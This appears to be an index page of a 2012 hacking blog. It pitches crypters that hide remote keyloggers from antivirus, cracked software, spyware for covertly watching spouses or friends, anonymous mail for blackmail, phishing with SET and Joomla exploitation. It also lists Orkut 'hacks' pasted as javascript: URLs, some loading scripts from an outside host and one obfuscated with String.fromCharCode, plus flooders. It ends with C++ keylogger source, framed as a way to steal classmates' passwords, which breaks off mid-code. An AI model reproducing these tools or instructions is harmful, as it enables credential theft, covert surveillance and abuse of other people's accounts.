Now you all can invite me on skype for any kind of help required as my username is krackoworld


31 May 2012

How to Make Remote Keylogger Undetectable from Antivirus with FUD Crypter


star crypter full versionIn my previous article, i have clearly mentioned how to install remote keylogger (FUD) into your Victims Computer in simple way but now the problem is that it may be detected by some antivirus and getting errors in running them properly. Hence today i am going to share an complete tutorial on How to make these remote keylogger undetectable from popular Antivirus so as to make keylogging easy. So lets start with the Crypter definition first.

What is a Crypter?

Crypter is a special type of software used to hide viruses, malware, keyloggers or tools from Antiviruses as to make it fully undetectable. Thus, a Crypter is a program that allow users to crypt the source code of their program to Bypass antivirus detection mainly. Therefore our crypted file becomes UD (undetectable) or FUD (fully undetectable).


30 May 2012

Hack Twitter With Twitter Bot- Scam or Legit?


twitter botWell Everybody knows about Twitter one n only site in Fans and Following of Celebrities. At Twitter, we can post our status known as Tweets, update our Profile with pics and personal Biodata etc. But it can be time consuming to keep up to date and often gets forgotten. I guess Everybody is waiting for a Solution. So Today I will give you a software named as Twitter Bot which will automate all your twitter tasks properly.

Twitter Bot can do a lot of amazing things without any need of User Intervention that's why it is called a Bot. Why one should have this software? I would say checkout the functions of this software and you will get your answer.


How to Install Siri on iPad 2 – Video Tutorial


siri on ipad 2Siri stands for Speech Interpretation and Recognition Interface that is an intelligent personal assistant and knowledge navigator which works as an application for Apple's iOS. The application uses a natural language user interface to answer questions, make recommendations, and perform actions by delegating requests to a set of Web services. Apple claims that the software adapts to the user's individual preferences over time and personalizes results, and performing tasks such as finding recommendations for nearby restaurants, or getting directions. Here today i will show you a video telling how to install it on iPad 2 properly.


How to send Anonymous Mail to anyone by making up your own Server


Now a days due to grown spam networks over internet, everyone wants to send anonymous mail to his/her victim for various purposes like blackmailing, fun or it could be any other reason etc. Therefore today we will learn How to send these types of mails by creating your own Home base server just below. Hope you all will like this trick very much. Cheers!


29 May 2012

Top 15 Hacking Movies Ever


top 15 hacking moviesThe word Hacking is an art for some, for some it’s fun and for some it’s serious shit. Some people gets happier in hacking small email accounts and some getting not happier even for hacking down a nation also. But for me its a true beneficial knowledge which can be used to protect our self  from various Cyber Crimes in 2012. Hence watching films in favour of them is fun and enjoyable! Therefore today i came up with the top 10 Best hacking films ever just below. Hope you all will like it!


28 May 2012

Download Worlds Best IP Hiding Software Full Version Cracked- Hide my IP & Real Hide IP


ip hiding softs 2012All of you might know that your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Therefore today i brought you the worlds best 2 IP Hiding software's ever named as Hide My IP and Real Hide IP (Full version cracked) which allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button. So lets start with 1st one.

1. Hide my IP 5.2 KEYGEN *FULL VERSION* KEYGEN CRACK !:

hide my ip

Key Features-

  • Fast & Secure Browsing - Don’t waste your time in testing slow and dangerous public proxies. Use Hide the IP for blazing fast proxy servers and 100% security.
  • Anonymous Web Surfing - Protect your privacy and cover your tracks! Select from one of our many fake proxy IP addresses for totally anonymous browsing.
  • Send Anonymous Emails - Hide your IP in E-mail headers. Supports Webmail services like Yahoo, Hotmail, and Gmail. Mail clients supported with a Premium account include Outlook, Outlook Express, Eudora, and more!
  • Protect Your Identity and Stop Hackers - Identity thieves can use your IP addresses to compromise your computer. Installing keyloggers, Trojans, and other tools to aid their crime. Stop them at the source by hiding your IP!
  • Advanced Application Support - Hide My IP 5.3 works with all major browsers and dozens of instant messengers, E-mail clients, games, and more!
  • Un-ban Your IP From Forums, Blogs, and other Websites - By faking your IP you can often access many sites you were banned from. Use with Cookie Crumble for the most effectiveness.

Download here

2. Real Hide IP 3.5.7.2+Crack -Full Version:

Real Hide IP 4.1.6.2 full Crack and Patch

Key Features-

  • Hide Your Real IP Address
    Be assigned fake IP addresses from different countries to conceal your real IP.
  • Anonymous Web Surfing
    Surf anonymously with fake IP, whenever you want to.
  • Protect Your Identity Against Hackers
    Protect you from hackers and identity thieves who will be tricked by your fake IP.
  • Un-ban Yourself from Forums or Restricted Websites
    Real Hide IP allows you to access any forums, blogs or websites that have ever banned you.
  • Prevent Websites from Tracking Your Online Activities
    Hide your real IP when you are surfing the Internet to prevent you from being tracked by websites.

    How it Works:

    smallhowitworks

Download here


27 May 2012

What is MD5 Hash and How to Use It ?


Today In this post, I am going to explain one of my favourite and interesting cryptographic algorithm called MD5 (Message-Digest algorithm 5). This algorithm is mainly used to perform file integrity checks under most circumstances. The MD5 Message-Digest Algorithm is a widely used cryptographic hash function that produces a 128-bit (16-byte) hash value. Specified in RFC 1321, MD5 has been employed in a wide variety of security applications, and is also commonly used to check data integrity. MD5 was designed by Ron Rivest in 1991 to replace an earlier hash function, MD4. An MD5 hash is typically expressed as a 32-digit hexadecimal number etc.


Find Highly Skilled Computer Security Professionals at SageIO


demoYes i am talking about the worlds leading site named as SageIO used for matching the Computer Security Professionals with jobs issued by the businessmen's. Hence SageIO is committed to provide an free environment where small and medium sized businesses can access hard to find talent, and where larger businesses can access unique intellectual property in the computer security domain. We understand the unique dynamics of the Computer Security space, both offensive and defensive and that is why we know we can help you. Let us know if there is anything we can do to serve you.


How to spy a Mobile Phone and Monitor a Remote PC


spy cell phones and monitor remote PCAre you curious about to know the back activities of your spouse, kids, friends or employees at Mobile or PC, If yes then you are at the right place as today i am going to tell you how? Now you can see their activities without getting physical touch in less than no time through 2 wonderful software's named as Sniperspy and Mobile-Spy etc. Please read the below tutorial for more details. Enjoy reading…


26 May 2012

Download Ardamax Keylogger V3.9 Full Version Cracked


Ardamax Keylogger V4Hi friends, Hope all you are enjoying my posts as regularly! Today i am going to provide you a paid keylogger named as Ardamax Keylogger which can help you a lot to hack accounts very easily. It is considered as the best keylogger of all time. Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.


Download Hakin9 Magazine free- Worlds Best IT Magazine Ever


hakin9Yes i am talking about Hakin9- the worlds best IT Magazine ever is a payable weekly magazine totally devoted to IT and Computer security. It covers techniques of breaking into computer systems, defence and protection methods, tools and latest trends in IT Security. This site also gives us free articles,news,product reviews,subscriptions,downloads,software's etc. related to IT and Programming.

Hakin9 has 4 different editions every month.

  • Hakin9 – main issue,
  • Hakin9 Extra – every issue is devoted to one topic only,
  • Exploiting Software magazine – Partition Analysis, Stack Overflow and many more,
  • Mobile Security – hacking and securing of mobile systems and applications.

    Our magazines are useful for everyone interested in securing and hacking; both professionals (security officers, system administrators) and hobbyists.
    We are only in digital version every issue is available for download in pdf from our website.

    Important:

    You can check its products and magazines downloads at here.


  • 25 May 2012

    Anonymous Hacker attacks Indian government over the file sharing ban


    After the banning of some file sharing sites in India, Anonymous Hackers has turned its attention to it, taking down the web sites of the Supreme Court, the country’s two major political parties and several government sites in retaliation for a court injunction which led to the blocking of several video sharing and bit torrent sites.

    Anonymous tweeted saying that it was now India’s time to bring in a new government.“Namaste #India, your time has come to trash the current government and install a new one. Good luck. | #SaveTPB #Anonymous #Censorship”.

    The hacking was reportedly in response to the blocking of torrent site thepiratebay.com and vimeo.com.While the Supreme Court of India website came back online after a little while, the Congress website was still offline at the time of filing of this report.The Department of Telecommunications (DoT) website had also reportedly come under attack.

    The group first signalled its intent to launch #OpIndia in a YouTube message posted over a week ago, which said the following:

    We have come to the conclusion that the Indian government has failed. It is time that we all rise and stand against the corrupt government. The Department of Telecommunications has ordered Internet Service Providers to block file-sharing sites in India. We cannot let this happen.

    In late March, Chennai-based Copyright labs won a restraining order that made Indian ISPs and phone firms stop their customers reaching sites that were illegally sharing copies of Bollywood films called 3 and Dhammu.

    Some people can still access Vimeo and The Pirate Bay. It seems that the sites were initially blocked by Reliance, followed by Airtel. The users who faced the blocking got a message saying that this was due to a DOT regulation, but later the message said that it was because of a court order. The UN is expected to discuss the proposal in the next 72 hours. The proposal would end "equal say" process for internet governance and push the civil society to the fringes.The proposed Committee for Internet Related Polices (CIRP) would be 50-member body funded by the UN. It would meet once a year and would have the power to oversee all internet standards bodies etc.

    To knock out the sites, Anonymous bombarded them with data, a tactic known as a Distributed Denial of Service (DDoS) attack.The tactic had only partial success as most of the sites targeted soon recovered and were only offline intermittently.

    Anonymous Tweet: "We are not doing any permanent damage to the websites. We just want file sharing sites to be unblocked."

    That's it from TheHackerNews!


    Introduction to SSH


    0596000111_lrgSecure Shell (SSH) is a network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network: a server and a client (running SSH server and SSH client programs, respectively). SSH replaces ancient insecure applications like TELNET for Windows and rlogin, rsh, rcp, and rexec for both Linux and Windows. The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2.

    If computer A wants to connect to computer B via a secure SSH connection, computer A must be running an SSH client and computer B must be running an SSH daemon or server. When data goes from computer A, it is encrypted and received at computer B, where it is decrypted.

    Definition

    SSH uses public-key cryptography to authenticate the remote computer and allow it to authenticate the user, if necessary. Anyone can produce a matching pair of different keys (public and private). The public key is placed on all computers that must allow access to the owner of the matching private key (the owner keeps the private key secret). While authentication is based on the private key, the key itself is never transferred through the network during authentication.

    Usage

    SSH is typically used to log into a remote machine and execute commands, but it also supports tunnelling, forwarding TCP ports and X11 connections; it can transfer files using the associated SSH file transfer (SFTP) or secure copy (SCP) protocols. SSH uses the client-server model.

    The standard TCP port 22 has been assigned for contacting SSH servers, though administrators frequently change it to a non-standard port as an additional security measure.

    What is SSH used for?

    • To securely log into a shell on a remote host and to securely execute commands on that remote host.
    • To securely transfer files.
    • For browsing the web securely via an encrypted proxy connection.

    That's it for todays!


    How to Disable Yahoo from Tracking you?


    yahoo privacyHi friends! as you all know, Yahoo! upgraded its features and the capacities of the mail accounts have grown to 2GB. That's good for sure, but the "monitoring" methods that we all have been far too familiar with in the last couple of years have been renewed with this move also. Yahoo! is now keeping track of which sites its members that are getting into groups or using Yahoo! services are visiting and storing this data with a method called "Web Beacons". The aim is to give these statistics to the partner companies arranged by agreement and to improve the "advertisement guiding" function.
    However, those who are bothered by this and do not want to be kept track of have still a choice. Yahoo! has hidden this option way deep inside somewhere but I'm declaring it here in case there are people who want it anyway:

    Procedure:

    1. Visit http://info.yahoo.com/privacy/us/yahoo/opt_out/targeting/details.html and click opt out button carefully.

    Note- After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual surfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!)
    You're done! Now Yahoo! will not record what you're doing during surfing.

    You can let your friends that might be interested know about this; since no matter how "innocent" it may seem, it's still a violation of privacy. Thanks.


    Top 26 Orkut JavaScript's Hacks of 2012


    Orkut as you all knows ancient Facebook for todays people and now a days runs very low as compared to Twitter, Google plus and Facebook. Orkut is a social division of Google and sucks due to its high loading time, system and old style chat box. It also comes with many loopholes, bugs in hacking, therefore i will show some of its JavaScript's hack of 2012 ( the updated one) today among you people. Hope you all will like and enjoy it.

    Top 26 Orkut Hacks of 2012:

    Scrap All
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/photo.js';void(0)
    Hit enter.
    It sends scrap to all the friend's automatically.

    Unlock Any Scrapbook
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/scrapbook.js';void(0)
    Hit enter.
    It unlocks all scrapbooks automatically.

    Unlock Any Album
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/album.js';void(0)
    Hit enter.
    It unlocks all albums automatically.

    Increase your fans
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/fans.js';void(0)
    Hit enter.
    It increase your fans within minutes.

    Show Video Instead Of Profile Picture
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/video.js';void(0)
    Hit enter.
    It replaces video with your profile picture.

    Scrapbook Flooder
    Open scrapbook.
    Write something in the text box.
    Donot press submit
    Copy the following java script into the URL bar.
    javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+='<iframe name="SbFlood" width="800" height="600"/>'; function a(){vi=replyForm;vi.toUserId.value=nb;vi.target="SbFlood";vi.scrapText.value=nb1 + "[silver]" + i ;vi.action='Scrapbook.aspx?Action.submit';vi.submit();i++};void(setInterval(a,1050))
    Hit enter.
    Close the window or press refresh to stop the flooding.

    Add a Friend
    This code will add your friend automatically when you run this script.
    Run the on your friend's profile whom you want to add.
    Paste the script and run on the page you have opened(friend's profile).
    javascript:add=document.forms[1];add.action='FriendAdd.aspx?Action.yes&'+location.href.match(/uid=\d*/gi);add.submit(); void (0)
    Paste the script in URL and hit enter.You are done!!

    Poll Flooder
    Just open the Polls you to have flood and paste the script on address bar.javascript:inputs=document.getElementsByTagName('input');for(x=0;x<inputs.length;x++){tipo=inputs[x].type;if(tipo=="radio"){inputs[x].type="checkbox";inputs[x].checked="true"}};void(0)
    Hit Enter.
    After running this script all the options in the poll will be selected,then you have to press vote.So that you w'll be voting all the options at a time.
    This Script which will flood all the options at once but only for one time.

    Testimonial to All
    This Script is used to send testi to all your friend's.
    Open this Page and run the script.
    Paste the following javascript in your web browser address bar after navigating to the specified orkut page.javascript:vi=document.getElementsByTagName('TEXTAREA').item(0).value;d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="/TestimonialWrite.aspx?&Action.submit&countedTextbox="+vi+"&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),5000))

    Album Hack
    This Script will show or display the pictures which are hidden in friend's profile.
    Paste the following javascript in your web browser address bar after navigating to the specified orkut page. javascript:alert("Wait for few seconds for pic`s to load......");nb=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML="<center><font style='font-size:20'><b>hacking album...wait for a minute<br></b>http://www.fakers.co.nr</font>";for(i=1;i<=50;i++){document.body.innerHTML+='<img src="http://img3.orkut.com/images/milieu/'+i+'/0/'+nb+'.jpg"><br><br><br><br>';};void(0)

    Mass scrap deleter
    Open your scrapbook.
    Copy the following java script into the URL bar.
    javascript:i=0;document.body.innerHTML+='<iframe name="tio" width="800" height="600"></iframe>';window[0].location="http://www.orkut.com/Scrapbook.aspx?&pageSize=30";function nick(){document.forms[1].target="tio";window[0]._checkAll(window[0].document.scrapsForm, 'scrapKeys', true);window[0]._submitForm(window[0].document.forms[2], 'delete', '');window[0].location=window[0].document.links[20].href;};void(setInterval(nick,2000))
    Hit enter.
    Close the window or press refresh to stop the deleting.

    Coloured scraps
    Write anything in text box
    Copy the script and paste it in URL bar.
    Presss enter
    Now submit the scrap
    javascript:cor=new Array('green','red','blue','maroon');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp[l]+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n');void(0)

    New way of writing
    Write anything in text box
    Copy the script and paste it in URL bar.
    Presss enter
    Now submit the scrap
    javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/p/gi,"ρ");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"т");txt.value=txt.value.replace(/E/gi,"є");txt.value=txt.value.replace(/u/gi,"υ");txt.value=txt.value.replace(/h/gi,"н");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"я");void(0);

    Message Reverser
    Open scrapbook
    Write text in text box.
    Copy the script in URL bar and hit enter.
    Now submit the scrap
    javascript:alert("Katyal Rocks");msgm=prompt("message");function reverse() { var inp = msgm; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}txt=document.getElementsByTagName('textarea')[0];txt.value=outp ;}; reverse();

    Dictionary in orkut
    Copy the script in URL bar and hit enter.
    Write the desired word and get its meaning.
    javascript:eval(String.fromCharCode(97, 61, 112, 114, 111, 109, 112, 116, 40, 34, 69, 110, 116, 101, 114, 32, 87, 111, 114, 100, 32, 84, 111, 32, 66, 101, 32, 83, 101, 97, 114, 99, 104, 101, 100, 32, 73, 110, 32, 68, 105, 99, 116, 105, 111, 110, 97, 114, 121, 34, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 43, 61, 39, 60, 105, 102, 114, 97, 109, 101, 32, 110, 97, 109, 101, 61, 34, 97, 114, 115, 104, 34, 32, 119, 105, 100, 116, 104, 61, 34, 49, 48, 50, 52, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 55, 54, 56, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 39, 59, 119, 105, 110, 100, 111, 119, 91, 48, 93, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 100, 105, 99, 116, 105, 111, 110, 97, 114, 121, 46, 104, 109, 47, 115, 101, 97, 114, 99, 104, 95, 102, 117, 110, 99, 116, 105, 111, 110, 46, 112, 104, 112, 63, 113, 61, 34, 32, 43, 97));void(0)

    Profile without picture
    Use this script while you are in cropping stage
    javascript:i=document.getElementsByTagName('input');i['apw'].value="1";i['aph'].value="1";i['apx'].value="0";i['apy'].value="0";i['apdw'].value=crpImg.width;i['apdh'].value=crpImg.height;_submitForm(document.getElementById('cropForm'),'crop');void(0)

    Album flooder
    Goto http://www.orkut.com/Album.aspx
    Then browse pic which u want to flood after selection run this script.
    javascript:function devil(){_submitForm(document.forms[1], 'upload', '');}void(setInterval(devil,350));

    Vibrator in orkut
    Just open orkut page and copy this script in URL bar.
    javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!skcoR llA parcS"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
    Hit enter.

    Add all to your hot list
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addHot&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))
    Hit enter.

    Add all to your ignore list
    Just open orkut page and copy this script in URL bar.
    javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addIgonre&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))
    Hit enter.

    Add all ur friends to ur crush list
    Open this Page and run the script.
    Allow all pop ups of orkut.com
    javascript:d=document;a=d.forms[1];a.target="nb";i=0;void(setInterval((function () {a.action="Profile.aspx?Action.addCrush&uid="+d.getElementsByTagName("option")[i++].value;a.submit()}),2000))

    Empty ur crush list
    javascript:i=0;document.body.innerHTML+='<iframe name="nobody" width="800" height="600"></iframe>';window[0].location="/Marks.aspx?mid=3";function nb(){document.forms[1].target="nobody";window[0]._submitForm(window[0].document.forms[1], 'delete', '');};void(setInterval(nb,2000));

    View UID's of all friends
    Copy the script in in friend's list.
    Hit enter
    javascript:var text_LoL = document.body.innerHTML.match(/uid=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 = "";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' + text_LoL[index_1] + '",<br>'} else {text_LoL_1 = text_LoL_1}};document.write(text_LoL_1)

    View all community ids
    Copy the scipt in communities page.
    Hit enter.
    javascript:var text_LoL = document.body.innerHTML.match(/cmm=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 ="";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' +text_LoL[index_1] + '",'} else {text_LoL_1 = text_LoL_1}};

    Post same topic in selected communities
    Paste all the community UID,s in the given format cmm=['42454897','5866948']; (even a comma makes a difference)
    Open any non-anonymous community
    Type the Subject and Body[colour and smileys allowed]
    Run the script and allow all pop ups.
    javascript:var text_LoL = document.body.innerHTML.match(/cmm=\d+/gi);var text_LoL = text_LoL.join();var text_LoL = text_LoL.match(/\d+/gi);var text_LoL_1 ="";for (index_1 = text_LoL.length-1;index_1 >= 0;index_1--){if (text_LoL_1.indexOf(text_LoL[index_1]) == -1) {text_LoL_1 = text_LoL_1 + '"' +text_LoL[index_1] + '",'} else {text_LoL_1 = text_LoL_1}}; You will find the topic(posted by you) in all the selected communities

    See your signature and token id
    Copy the script in scrapbook URL bar and hit enter.
    javascript:df=document.forms[1];df.scrapText.value='Signature: ' +df.signature.value+'\nPost Token: '+df.POST_TOKEN.value;void(0)

    The end!


    23 May 2012

    Hacking Facebook, Gmail Account Using Backtrack and SET



    Hello, friends i am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.Things you needed are following:
    1. Backtrack 5 R2
    2. Internet connection 


    Now follow all my steps like I am showing in this post:

    1. First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter like in image. 


    Hacking Joomla Blog With BackTrack 5 R2




    Here i am with a new working hack to scan and exploit a Joomla blog. Things you needed are following:
    1.Backtrack 5
    2.Internet connection
    Here are following steps, please follow all the steps according to this post:

     1. Click on Applications/Backtrack/Vulnerability assesment/Web Vulnerability assessment/CMS Vulnerability Identification/joomscan.


    What is Google Dart (Programming language)


    Google-DartGoogle Dart is an open source Web programming language developed by Google. It was unveiled at the GOTO conference in Aarhus, 2011 October 10-12. The goal of Dart is "ultimately to replace JavaScript as the lingua franca of web development on the open web platform." Dart is intended to solve JavaScript's problems (which, according to a leaked memo, cannot be solved by evolving the language) while offering better performance, the ability "to be more easily tooled for large-scale projects" and better security features. Google also is working on Dart to help them build more complex, full-featured client-side Web apps.

    Dart is a class-based, single inheritance, object-oriented language with C-style syntax. It supports interfaces, abstract classes, and reified generics. Dart's support of optional typing is perhaps the most interesting feature for a language targeted at mass adoption. Static type annotations do not affect the runtime semantics of the code. Instead, the type annotations can provide clear documentation for tools like static checkers and dynamic run time checks.

    It basically comes along with 2 modes:

    1. Checked mode
    2. Production mode

    Compilers

    dartc was the first compiler that emitted JavaScript from Dart code. dartc has been deprecated. Frog was the second instance of a Dart-to-JavaScript compiler, this time written in Dart. Frog never implemented the full semantics of the language, though, and a new compiler called dart2js was created. Also written in Dart, dart2js is the current Dart-to-JavaScript compiler and is intended to implement the full Dart language spec and semantics.

    Editors

    On November 18, 2011, Google released Dart Editor, an open-source Dart editor based on Eclipse components, for Mac OS X, Windows, and Linux. This editor supports syntax highlighting, code completion, JavaScript compilation, running both web and server Dart apps, and even debugging.

    Example-

    The famous Hello World example:

    main() {
    print('Hello World!');
    }



    For more details plz visit its official website at here.


    NMAP v6.00 Released for Windows, Mac and Linux


    As you all know that Nmap stands for Network Mapper which is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, Nmap accounts for the network conditions (latency fluctuations, network congestion, the target interference with the scan) during the run. Also, owing to the large and active user community providing feedback and contributing to its features, Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed; it can determine the operating system of the target, names and versions of the listening services, estimated uptime, type of device, and presence of a firewall.

     

     

     

     

     

     

     

     

     

     



    Compatibility:

    Nmap runs successfully on GNU/Linux, Microsoft Windows, Solaris, HP-UX and BSD variants (including Mac OS X), and also on Amiga OS and SGI IRIX. GNU/Linux is the most popular Nmap platform with Windows following it closely.

    Latest added Features in its new version:

    NSE Enhanced, Better Web Scanning, Full IPv6 Support, New Nping Tool, Better Zenmap GUI results viewer, Faster scans etc.

    Downloading links:

    For Linux: nmap-6.00.tar.bz2

    For Windows: nmap-6.00-win32.zip

    For Mac: http://nmap.org/book/inst-macosx.html


    22 May 2012

    Domain Hijacking and its Countermeasures


    domain hijackingI think all of you may know Domain Hijacking and what is it? Domain hijacking same as domain theft is the act of changing the registration of a domain name without the permission of its original registrant. This can be financially devastating to the original domain name holder, who may have derived commercial income from a website hosted at the domain or conducted business through that domain's e-mail accounts. Additionally, the hijacker can use the domain name to facilitate illegal activity such as phishing, where a website is replaced by an identical website that records private information such as log-in passwords.

    The Process of Domain Hijacking:

    To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you will need the following ingredients below-

    1. The domain registrar name for the target domain.

    2. The administrative email address associated with the target domain.

    These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, go to whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

    To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

    The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.

    Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

    Prevention and Protections:

    1. ICANN imposes a 60-day waiting period between a change in registration information and a transfer to another registrar; this is intended to make domain hijacking more difficult, since a transferred domain is much more difficult to reclaim, and it is more likely that the original registrant will discover the change in that period and alert the registrar. Extensible Provisioning Protocol is used for many TLD registries, and uses an authorization code issued exclusively to the domain registrant as a security measure to prevent unauthorized transfers.

    2. Second way is to protect your administrative email account associated with the domain. See also- What to do when your Gmail Account is Hacked ?

    3. And last but not the least, go for an private domain registration.

    Done! Stay Tuned for more exciting stuffs like this…


    20 May 2012

    How to Hack any Wi-Fi Network through NR Tool


    All of you knows How Wi-Fi is important for us to access free and high speed internet. Wi-Fi network is a wireless network used mostly for local area purpose. It is a Secured Network which allows the computer to access the Internet without any cable or wire. Cracking it is fun and enjoyable for us. So therefore today we are going to learn it by using a simple software named as Network Rehacker tool. Enjoy…

    How to crack Wi-Fi?

    1) First of all download and install this hacking software from here.
    2) Now Select the networks you want to hack with
    3) And Press the Crack Button
    4. All done! Stay connected with your nearest Wi-Fi access along with proper pass key.

    Ask for any help required below.


    Create an Keylogger Using Visual C++


    Hi friends I hope all of you were fine and enjoying my every bit of posts. Hence today I am going to tell you an secret of making your own keylogger at C++ by giving you the Spyware code in the last. It is going to be fun. You can install this spyware in your college/school or in your friend Computer system and get their username and passwords easily. So lets start…

    Instructions to create an simple keylogger:

    1. First of all download and install Dev C++ from here.

    2. Now Go to File->New->Source File. Here you can see an blank window space where you will paste the following source code just below.

    #include <iostream>
    using namespace std;
    #include <windows.h>
    #include <winuser.h>
    int Save (int key_stroke, char *file);
    void Stealth();
    int main()
    {
    Stealth();
    char i;
    while (1)
    {
    for(i = 8; i <= 190; i++)
    {
    if (GetAsyncKeyState(i) == -32767)
    Save (i,"LOG.txt");
    }
    }
    system ("PAUSE");
    return 0;
    }
    /* *********************************** */
    int Save (int key_stroke, char *file)
    {
    if ( (key_stroke == 1) || (key_stroke == 2) )
    return 0;
    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");
    cout << key_stroke << endl;
    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
    fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
    fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
    fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
    fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
    fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
    fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
    fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
    fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
    fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
    fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
    fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
    fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
